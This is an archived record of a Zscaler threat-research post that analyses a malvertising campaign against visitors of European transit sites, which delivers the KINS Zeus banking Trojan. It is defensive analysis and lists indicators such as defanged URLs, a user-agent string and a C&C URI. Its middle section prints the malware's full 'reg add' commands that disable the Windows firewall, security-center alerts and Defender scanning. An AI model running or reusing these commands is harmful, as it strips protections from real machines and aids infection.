{
	"id": "305a27a7-a80a-412b-8a52-92af61ba8e45",
	"created_at": "2026-04-06T00:12:39.375664Z",
	"updated_at": "2026-04-10T03:21:07.088612Z",
	"deleted_at": null,
	"sha1_hash": "488282fe88133328ea9ee139de9f3488205d4c86",
	"title": "Malvertising Targeting European Transit Users | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1118188,
	"plain_text": "Malvertising Targeting European Transit Users | Zscaler\r\nBy Chris Mannon\r\nPublished: 2015-03-11 · Archived: 2026-04-05 16:45:03 UTC\r\nZscaler Blog\r\nGet the latest Zscaler blog updates in your inbox\r\nMalvertising has been an active and growing attack vector for delivering malicious payloads to unsuspecting\r\nusers. ThreatLabZ recently uncovered a malvertising campaign targeting European transit users and the end\r\npayload appears to be downloading the KINS Zeus variant.\r\nThe KINS (Kasper Internet Non-Security) variant of Zeus is a banking Trojan that has been prevalent since 2011.\r\nKINS is a crimekit that was developed based off the leaked ZeuS source code to replace the aged Citadel Trojan\r\nwhich was used to harvest credentials from victim PCs.\r\nThreatLabZ has seen many instances of this threat being downloaded in the wild with very low AV detection.  The\r\nmalicious dropper payload is downloaded from URLs that matches the following pattern:\r\n[domain]:[nonstandard port]/[var1].php?[var2]=n\u0026[var3]=n\u0026[var4]=n\u0026[var5]=n\u0026[var6]=n\u0026[var7]=n\u0026\r\n[var8]=n\r\nn = random [1-4]digit number\r\n Some examples of this activity are seen below:\r\nrasaqsense[.]abbington[.]org:9090/full[.]php?refer=2010\u0026reklama=4\u0026star=860\u0026site-map=171\u0026blogs=78\u0026click=2407\u0026honda=2707\r\nrazorssense[.]abbington[.]org:9090/full[.]php?back=1933\u0026reklama=4\u0026edit=2109\u0026site-map=171\u0026mail=366\u0026page=6\u0026virus=986\r\nbrazil[.]telefonabrasil[.]com[.]br:8181/beta[.]php?\r\ncorp=252\u0026play=1249\u0026popular=4\u0026video=775\u0026rssfeed=171\u0026store=1416\u0026deals=634\r\nabfronikl[.]mobi:20204/store[.]php?\r\nrates=2197\u0026sendmail=4\u0026ports=635\u0026logout=171\u0026other=1679\u0026image=523\u0026comp=2566\r\npanga[.]campanha[.]ga:8181/hardcore[.]php?\r\nbest=1704\u0026wink=205\u0026humor=4\u0026cover=2210\u0026support=171\u0026reply=1750\u0026atom=1017\r\nsega[.]taxivega[.]kz:17340/music[.]php?\r\nmacos=2433\u0026rate=1041\u0026game=4\u0026nomic=1534\u0026layout=171\u0026humor=2699\u0026usage=2115\r\nseww[.]istec[.]se:17340/music[.]php?\r\nmedia=432\u0026page=2637\u0026game=4\u0026audit=833\u0026layout=171\u0026about=2332\u0026cover=2361\r\nanarhism[.]temayang[.]tk:17340/music[.]php?\r\nevent=2561\u0026game=4\u0026stars=2402\u0026layout=171\u0026warez=2596\u0026intl=1014\u0026story=2510\r\nhttps://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users\r\nPage 1 of 9\n\nclipsalinga[.]org:20204/store[.]php?\r\nintm=134\u0026sendmail=4\u0026front=1022\u0026logout=171\u0026tool=2554\u0026radio=116\u0026docs=1851\r\nclipsalinga[.]org:20204/store[.]php?\r\nlinux=280\u0026sendmail=4\u0026best=361\u0026logout=171\u0026cert=1236\u0026quote=118\u0026math=2297\r\nThis variant of the KINS crimekit is spreading through malvertising attempts targeting European users. All the\r\ndownload attempts seen above have two things in common:\r\n1. Victims were visiting a site related to European transit\r\n2. Victims were redirected to the final destination through an advertising network\r\n \r\nSample infection cycle URLs\r\n \r\nThe malware masquerades as a PDF document to lure an unsuspecting user into opening the file. Upon execution,\r\nit creates a copy of itself in the %Application Data% directory, deletes the original copy of itself and injects into\r\nthe system explorer.exe process to perform variety of actions. The dropped file on the infected system can be\r\nfound at one of the following two locations:\r\n%Application Data%\\svchoste.exe [Windows XP]\r\n%Application Data%\\Roaming\\[random 4-5 character string]\\[random 4-5 character string].exe  [Windows\r\n7]\r\nThe bot further makes multiple system registry modifications to evade detection:\r\nMicrosoft security center - disable update notifications, disable antimalware scan:\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Security Center /v UpdatesDisableNotify /t\r\nreg_dword /d 1 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Security Center /v FirewallOverride /t reg_dword /d\r\n1 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Security Center /v FirewallDisableNotify /t\r\nreg_dword /d 1 /f\r\nhttps://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users\r\nPage 2 of 9\n\nreg add HKLM\\SOFTWARE\\Microsoft\\Security Center /v AntiVirusOverride /t reg_dword\r\n/d 1 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Security Center /v AntiVirusDisableNotify /t\r\nreg_dword /d 1 /f\r\nWindows firewall settings - Allow exceptions, disable notifications, disable the firewall:\r\nreg add\r\nHKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\DomainProfile\r\n/v DisableNotifications /t reg_dword /d 1 /f\r\nreg add\r\nHKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\DomainProfile\r\n/v DoNotAllowExceptions /t reg_dword /d 0 /f\r\nreg add\r\nHKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\DomainProfile\r\n/v EnableFirewall /t reg_dword /d 0 /f\r\nreg add\r\nHKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\publicprofile\r\n/v DisableNotifications /t reg_dword /d 1 /f\r\nreg add\r\nHKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\standardprofile\r\n/v DisableNotifications /t reg_dword /d 1 /f\r\nreg add\r\nHKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\publicprofile\r\n/v DoNotAllowExceptions /t reg_dword /d 0 /f\r\nreg add\r\nHKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\standardprofile\r\n/v DoNotAllowExceptions /t reg_dword /d 0 /f\r\nreg add\r\nHKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\publicprofile\r\n/v EnableFirewall /t reg_dword /d 0 /f\r\nreg add\r\nHKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\standardprofile\r\n/v EnableFirewall /t reg_dword /d 0 /f\r\nWindows Defender \u0026 AntiMalware settings - Exclude malware processes, injected system processes and\r\ncertain file types from scanning:\r\nhttps://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users\r\nPage 3 of 9\n\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes  \" /v\r\nsvchost.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes  \" /v\r\nconsent.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes  \" /v\r\nrundll32.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes  \" /v\r\nspoolsv.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes  \" /v\r\nexplorer.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes  \" /v\r\nrgjdu.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes  \" /v\r\nafwqs.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions  \" /v\r\n*.tmp /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions  \" /v\r\n*.dll /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions  \" /v\r\n*.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes  \" /v\r\nsvchost.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes  \" /v\r\nconsent.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes  \" /v\r\nrundll32.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes  \" /v\r\nspoolsv.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes  \" /v\r\nexplorer.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes  \" /v\r\nrgjdu.exe /t  REG_DWORD /d 0  \r\nhttps://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users\r\nPage 4 of 9\n\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes  \" /v\r\nafwqs.exe /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Extensions  \" /v\r\n*.tmp /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Extensions  \" /v\r\n*.dll /t  REG_DWORD /d 0  \r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Extensions  \" /v\r\n*.exe /t  REG_DWORD /d 0\r\nThe injected code in the system explorer process is responsible for performing Command \u0026 Control (C\u0026C)\r\ncommunication. It also opens up a port (TCP 36139) on the victim machine listening for incoming connections.\r\nListening on TCP port 36139\r\nThere are two common network level indicators to identify a compromised node:\r\nA POST transaction with the following hard-coded User-Agent string\r\n \r\nMozilla/5.0 (Windows; Windows NT 7.1; en; rv:1.9.6.8) Gecko/20120122 Firefox/9.1.2\r\n \r\nA POST request made to a URI like '/common/link.php'.\r\n \r\nhttps://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users\r\nPage 5 of 9\n\nPOST encrypted information to C\u0026C server\r\nThe bot encrypts the system information in the following format and sends it via the above POST request to the\r\nC\u0026C server:\r\nv=%d\u0026s=%d\u0026h=%d\u0026un=%s\u0026o=%d\u0026c=%d\u0026ip=%s\u0026sys=%s\u0026uid=%d\u0026w=%d\u0026ftp=\r\nThe screenshot below shows the decrypted C\u0026C location as well as a remote configuration file location for the\r\nbot:\r\nhttps://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users\r\nPage 6 of 9\n\nDecrypted C\u0026C locations\r\nBelow is the C\u0026C call back activity for the month of January and February, 2015 and the Geo-location of the\r\nC\u0026C servers:\r\nhttps://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users\r\nPage 7 of 9\n\nC\u0026C server location\r\nMalvertising remains an effective exploit vector for threat actors to compromise victim systems.  The variation in\r\npayloads distributed through this tactic range from click-fraud botnet activity to highly effective crimeware,\r\ngiving complete control of the infected systems to the remote attackers.\r\nhttps://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users\r\nPage 8 of 9\n\nThank you for reading\r\nWas this post useful?\r\nDisclaimer: This blog post has been created by Zscaler for informational purposes only and is provided \"as is\"\r\nwithout any guarantees of accuracy, completeness or reliability. Zscaler assumes no responsibility for any errors or\r\nomissions or for any actions taken based on the information provided. Any third-party websites or resources\r\nlinked in this blog post are provided for convenience only, and Zscaler is not responsible for their content or\r\npractices. All content is subject to change without notice. By accessing this blog, you agree to these terms and\r\nacknowledge your sole responsibility to verify and use the information as appropriate for your needs.\r\nExplore more Zscaler blogs\r\nGet the latest Zscaler blog updates in your inbox\r\nBy submitting the form, you are agreeing to our privacy policy.\r\nSource: https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users\r\nhttps://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users"
	],
	"report_names": [
		"malvertising-targeting-european-transit-users"
	],
	"threat_actors": [],
	"ts_created_at": 1775434359,
	"ts_updated_at": 1775791267,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/488282fe88133328ea9ee139de9f3488205d4c86.pdf",
		"text": "https://archive.orkl.eu/488282fe88133328ea9ee139de9f3488205d4c86.txt",
		"img": "https://archive.orkl.eu/488282fe88133328ea9ee139de9f3488205d4c86.jpg"
	}
}